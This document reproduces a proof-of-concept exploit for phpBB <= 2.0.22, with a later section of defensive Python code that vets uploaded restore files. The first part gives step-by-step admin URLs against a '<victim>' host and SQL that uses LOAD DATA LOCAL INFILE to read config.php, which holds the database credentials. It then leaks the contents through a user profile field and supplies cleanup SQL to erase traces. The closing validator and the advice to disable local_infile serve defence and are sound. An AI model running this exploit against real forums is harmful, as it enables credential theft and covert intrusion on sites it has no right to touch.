Kekkei

phpBB <= 2.0.22 Remote Database Authentication Details POC


```text
## phpBB <= 2.0.22 Remote Database Authentication Details POC
##
## This text will show you how to get the content of the file
## config.php with the 'LOCAL INFILE' SQL command. You can also
## do it with 'LOAD_FILE' but you'll need file privileges, that's
## not interesting. To do it, you'll need Administrator rights
## (we'll use admin_db_utilities.php) and local_infile=ON
## (you don't need file privileges, that's why it's quite cool).
## PHP scripts should not permit the user to execute SQL commands.
##
## 1 Go to http://<victim>/login.php?redirect=admin/index.php&admin=1
## 2 Log in as Administrator
##
## 3 Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>
## 4 You'll get a full path disclosure, note it somewhere
##
## 5 Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>
## 6 Choose "Structure-Only backup" then click on "Start Backup"
## 7 Now open the file and search the table prefix, note it
##
## 8 Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>
## 9 Create a file which has this content [replace <phpbb_fullpath>,<user>,<prefix>]:
## /*----------------------------------------------------------------------*/
## CREATE TABLE tmp_hack(content text, email text, viewemail text);
## LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS
## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE
## username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');
## UPDATE <prefix>users SET user_viewemail=0, user_email=
## CONCAT('"><span class="gen">Encoded content</span><input',
## UNHEX(20),'type="text" value="',
## (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')
## WHERE username='<user>';
## /*----------------------------------------------------------------------*/
## 10 Choose the file then click on "Start Restore"
##
## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content
## 12 This is the encoded content of the file config.php, use the pack() function to decode it
## 13 For example, with php, type this in your shell: php -r "print(pack('H*','<encoded_file>'));"
## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)
##
## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:
## /*----------------------------------------------------------------------*/
## UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),
## user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';
## DROP TABLE tmp_hack;
## /*----------------------------------------------------------------------*/
##
## by DarkFig <gmdarkfig (at) gmail (dot) com>
## http://acid-root.new.fr/
## #acidroot@irc.worldnet.net
```
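The weakness the post relies on is that the restore feature executes whatever SQL the uploaded "backup" contains. A defender-side check, added here as an example and not part of the post or of phpBB itself: a vetting function that splits an uploaded dump into statements and rejects anything a genuine backup never contains (file-access statements such as LOAD DATA LOCAL INFILE, statement types other than DROP/CREATE/INSERT, and tables outside the configured prefix). The prefix `phpbb_`, the path `/var/www/phpbb/` and both dump bodies are constructed sample values.

```python
import re
# Statement shapes a phpBB 2.x backup legitimately contains: DROP/CREATE/INSERT on board tables.
ALLOWED = re.compile(r"^(DROP\s+TABLE(\s+IF\s+EXISTS)?|CREATE\s+TABLE|INSERT\s+INTO)\s+`?(\w+)`?", re.IGNORECASE)
# Constructs that read or write files on the database host; never part of a dump.
FILE_ACCESS = re.compile(r"\bLOAD\s+DATA\b|\bLOAD_FILE\s*\(|\bINTO\s+(OUTFILE|DUMPFILE)\b", re.IGNORECASE)
LITERAL = re.compile(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"")

def split_statements(sql):
    """Split on ';' outside quotes and comments (MySQL dialect, no DELIMITER support)."""
    stmts, buf, i, n = [], [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c in ("'", '"', '`'):                       # quoted literal or identifier
            j = i + 1
            while j < n and sql[j] != c:
                j += 2 if sql[j] == '\\' else 1        # skip backslash escapes
            buf.append(sql[i:j + 1]); i = j + 1
        elif sql.startswith('/*', i):                  # block comment
            j = sql.find('*/', i + 2); i = n if j < 0 else j + 2
        elif sql.startswith('--', i) or c == '#':      # line comment
            j = sql.find('\n', i); i = n if j < 0 else j + 1
        elif c == ';':
            stmts.append(''.join(buf).strip()); buf = []; i += 1
        else:
            buf.append(c); i += 1
    stmts.append(''.join(buf).strip())                 # trailing statement without ';'
    return [s for s in stmts if s]

def vet_restore_file(sql, prefix):
    """Return (statement, reason) pairs to reject; an empty list means the dump may be executed."""
    problems = []
    for stmt in split_statements(sql):
        bare = LITERAL.sub("''", stmt)                 # ignore keywords inside string values
        m = ALLOWED.match(stmt)
        if FILE_ACCESS.search(bare):
            problems.append((stmt, "server file access"))
        elif not m:
            problems.append((stmt, "statement type not permitted in a restore"))
        elif not m.group(3).lower().startswith(prefix.lower()):
            problems.append((stmt, f"table '{m.group(3)}' outside prefix '{prefix}'"))
    return problems

# Constructed sample: the post's restore file with its placeholders filled in.
MALICIOUS_DUMP = """/*--*/ CREATE TABLE tmp_hack(content text, email text, viewemail text);
LOAD DATA LOCAL INFILE '/var/www/phpbb/config.php' INTO TABLE tmp_hack FIELDS TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
UPDATE phpbb_users SET user_viewemail=0 WHERE username='admin';"""
# Constructed sample: a genuine-looking structure backup (one literal holds ';' and a keyword).
CLEAN_DUMP = """DROP TABLE IF EXISTS phpbb_users;
CREATE TABLE phpbb_users (user_id mediumint(8) NOT NULL, username varchar(25) NOT NULL);
INSERT INTO phpbb_users VALUES (2, 'admin; LOAD DATA LOCAL INFILE');"""
```

Filtering the upload is the application-side fix; on the server side, starting MySQL with local_infile disabled closes the LOCAL INFILE channel for every client regardless of what the application sends.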
